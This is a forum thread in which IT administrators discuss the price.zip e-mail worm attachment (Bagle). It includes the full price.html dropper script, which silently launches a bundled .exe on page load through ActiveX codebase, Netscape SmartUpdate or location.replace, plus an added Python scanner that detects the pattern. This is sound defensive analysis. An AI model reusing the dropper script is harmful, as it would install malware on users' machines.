Tek-Tips is the largest IT community on the Internet today!

price.zip ... anyone else getting this one?


Empeethree

IS-IT--Management
Mar 27, 2000
US
We have been getting a few messages with price.zip as an attachment. The zip has two files, price.html and price.exe.

Here is price.html:

<head>
<script language="JavaScript">
// path to the payload; every branch below ends up pointing the browser at it
var exepath='price/price.exe';
</script>

<SCRIPT LANGUAGE="JavaScript">
<!--
var bname=navigator.appName;
sewre = "rseI"; // never referenced again; filler
var bver=parseInt(navigator.appVersion);

function install() {
// bail out unless the browser reports 32-bit Windows
if ( navigator.platform && navigator.platform != 'Win32' ) {
location.replace('NOTWIN32WARNING.html');
return;
}
// IE: write a 1x1 <object> whose codebase is the .exe; if the CLSID is not
// already registered, IE downloads the codebase URL to "install" it
if (bname == 'Microsoft Internet Explorer' && bver >= 2) {
document.write('<object id="gib" width=1 height=1 classid="CLSID:018B7EC3-EECA-11d3-8E71-0000E82C6C0D" codebase="'+exepath+'"></object>');
// Netscape 4+: hand the .exe to SmartUpdate if it is enabled
} else if (bname == 'Netscape' && bver >= 4) {
trigger = netscape.softupdate.Trigger;
if (trigger.UpdateEnabled) {
trigger.StartSoftwareUpdate(exepath, trigger.DEFAULT_MODE)
} else {
location.replace(exepath); // no SmartUpdate: navigate straight to the .exe
}
// any other browser: navigate straight to the .exe
} else {
location.replace(exepath);
}
}

install(); // runs while the page is still loading; no user action needed

// -->
</script>
</head>




Rob

--------------------------------------
Trying is the first step to failure
Homer Simpson
--------------------------------------
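Everything that makes the posted price.html a dropper is visible as plain strings: an .exe path in a string literal, an <object codebase=...> install, netscape.softupdate.Trigger, and location.replace() aimed at the same file. That is enough for a gateway rule that does not depend on an AV signature. The following is an added example, not code from the thread or from any product mentioned in it: a small Python scanner that opens a zip attachment and blocks it when an HTML member names an .exe that is also bundled in the archive and contains one of those launch primitives. The sample archives, the stub price.exe bytes, the verdict names and the size cap are constructed for the example; the sample HTML is condensed from the price.html posted above.

```python
# Added example (not code from the thread): a mail-gateway style check for the
# price.zip dropper pattern. Sample archives are constructed in memory.
import io
import re
import zipfile

# Indicators taken from the posted price.html (all case-insensitive).
INDICATORS = {
    "exe_literal": re.compile(r"['\"][^'\"]*\.exe['\"]", re.I),           # an .exe path in a string literal
    "object_codebase": re.compile(r"<object\b[^>]*\bcodebase\s*=", re.I), # ActiveX <object codebase=...>
    "netscape_softupdate": re.compile(r"netscape\.softupdate\.Trigger", re.I),  # SmartUpdate launcher
    "location_replace": re.compile(r"location\.replace\s*\(", re.I),      # navigate straight to the payload
    "platform_check": re.compile(r"navigator\.platform", re.I),           # Win32-only gate
}
LAUNCH_PRIMITIVES = {"object_codebase", "netscape_softupdate", "location_replace"}
MAX_MEMBER_BYTES = 1 << 20  # assumed cap: read at most 1 MiB of any member

def script_indicators(html: str) -> set:
    """Names of the indicators present in one HTML member."""
    return {name for name, rx in INDICATORS.items() if rx.search(html)}

def referenced_exe_names(html: str) -> set:
    """Basenames of .exe paths found in string literals: 'price/price.exe' -> 'price.exe'."""
    found = set()
    for m in re.finditer(r"['\"]([^'\"]*\.exe)['\"]", html, re.I):
        found.add(m.group(1).replace("\\", "/").rsplit("/", 1)[-1].lower())
    return found

def scan_zip(data: bytes) -> dict:
    """Verdict 'allow', 'quarantine' or 'block' for one zip attachment, with the evidence."""
    result = {"verdict": "allow", "exe_members": [], "html_hits": {}, "reasons": []}
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        result["verdict"], result["reasons"] = "quarantine", ["not a valid zip"]
        return result
    exe_basenames, html_texts = set(), {}
    for info in zf.infolist():
        lower = info.filename.lower()
        if lower.endswith(".exe"):
            result["exe_members"].append(info.filename)
            exe_basenames.add(lower.rsplit("/", 1)[-1])
        elif lower.endswith((".htm", ".html")):
            with zf.open(info) as fh:
                html_texts[info.filename] = fh.read(MAX_MEMBER_BYTES).decode("utf-8", "replace")
    for name, html in html_texts.items():
        hits = script_indicators(html)
        if hits:
            result["html_hits"][name] = sorted(hits)
        targets = referenced_exe_names(html) & exe_basenames   # .exe named by the page AND bundled
        launches = hits & LAUNCH_PRIMITIVES
        if targets and launches:
            result["reasons"].append(f"{name} launches {sorted(targets)} via {sorted(launches)}")
    if result["reasons"]:
        result["verdict"] = "block"
    elif result["exe_members"]:
        result["verdict"] = "quarantine"  # bare executable in mail: hold it even without a dropper page
    return result

def build_zip(members: dict) -> bytes:
    """Constructed in-memory archive; members maps name -> str or bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()

# Condensed from the price.html posted in the thread; the launch lines are unchanged.
SAMPLE_PRICE_HTML = """<head>
<SCRIPT LANGUAGE="JavaScript">
var exepath='price/price.exe';
function install() {
if ( navigator.platform && navigator.platform != 'Win32' ) {
location.replace('NOTWIN32WARNING.html');
return;
}
if (navigator.appName == 'Microsoft Internet Explorer') {
document.write('<object id="gib" width=1 height=1 classid="CLSID:018B7EC3-EECA-11d3-8E71-0000E82C6C0D" codebase="'+exepath+'"></object>');
} else if (navigator.appName == 'Netscape') {
trigger = netscape.softupdate.Trigger;
trigger.StartSoftwareUpdate(exepath, trigger.DEFAULT_MODE)
} else {
location.replace(exepath);
}
}
install();
</script>
</head>
"""

def sample_price_zip() -> bytes:
    """price.zip as the first post describes it: price.html plus a stub price.exe (MZ header only)."""
    return build_zip({"price.html": SAMPLE_PRICE_HTML, "price.exe": b"MZ" + b"\x00" * 62})

def sample_benign_zip() -> bytes:
    """A harmless attachment: an HTML page linking to a CSV, no executable."""
    return build_zip({"report.html": '<html><body><a href="report.csv">report</a></body></html>',
                      "report.csv": "sku,price\n1001,9.99\n"})
```

Calling scan_zip(sample_price_zip()) returns verdict "block" with the reason naming price.html, price.exe and the three launch primitives; scan_zip(sample_benign_zip()) returns "allow". The block/quarantine split is deliberate: a zip carrying only an .exe is held rather than passed, and the rule only says "block" when the HTML both names a bundled executable and has a way to run it, so an HTML member that merely links to a file does not trip it.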
 
Yup.
Reads as JS\Illwill initially, but then the .exe carries Bagle as a payload.

Tired of waiting for an answer? Try asking better questions. See: faq222-2244
 
Out of curiosity, what is the (purported) origin on the ones you're receiving? The ones I'm picking up are from @btopenworld.com.
 
My company has seen about 10 of them in the last 2 hours. Several have been from people we know. My server bounces all e-mail from a non-traceable IP.

Hope this helps

AW
 
Am running an ePO report right now, but I estimate our Exchange server has quarantined more than 300 instances of this critter since 10:54 this morning. Persistent little bugger, isn't it? [smile]

[sub]"The Crystal Wind is the storm, and the storm is data, and the data is life. You have been slaves, denied the storm, denied the freedom of your data. That is now ended; the whirlwind is upon you . . . . . . Whether you like it or not."[/sub]

[sup]"Trent the Uncatchable" in The Long Run by Daniel Keys Moran[/sup]
 
McAfee update reads:

Update August 9, 2004 - The HTML file is detected with the 4167 (from Nov. 2001) and higher DATs as JS/IllWill. The DLL component is detected with 4335 (Mar. 2004) and higher DATs as W32/Bagle.dll.gen.
 